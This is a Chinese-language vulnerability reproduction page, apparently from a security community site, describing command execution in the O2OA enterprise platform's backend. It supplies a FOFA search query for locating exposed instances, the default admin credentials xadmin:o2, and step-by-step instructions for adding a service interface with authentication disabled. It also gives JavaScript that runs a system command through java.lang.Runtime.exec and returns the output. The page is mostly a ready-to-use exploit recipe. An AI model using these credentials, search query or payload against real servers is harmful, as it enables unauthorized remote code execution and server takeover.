漏洞描述

O2OA是一款Java开源企业信息化建设平台，包括流程管理、门户管理、信息管理、数据管理和服务管理五大平台，可以极大程度上减化企业信息化建设成本和业务应用开发难度。O2OA invoke后台存在命令执行漏洞，攻击者通过漏洞可以获取服务器权限。

fofa

title=="O2OA"

漏洞复现

1.输入默认账户密码登录系统

xadmin:o2

2.点击左上角图标→服务管理→新增CMD接口→复制如下执行whoami命令代码→启用鉴权选否→保存→点击运行即可得到回显

var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()));

var result = [];

while (true) {

    var oneline = bufReader.readLine();

    result.push(oneline);

    if (!oneline) break;

}

var result = { "Result": result };

this.response.setBody(result, "application/json");

------本页内容已结束，喜欢请分享------

感谢您的来访，获取更多精彩文章请收藏本站。

本站网络名称： 孤勇者社区

本站永久网址： https://www.gyzsq.com

网站侵权说明：本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
3 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END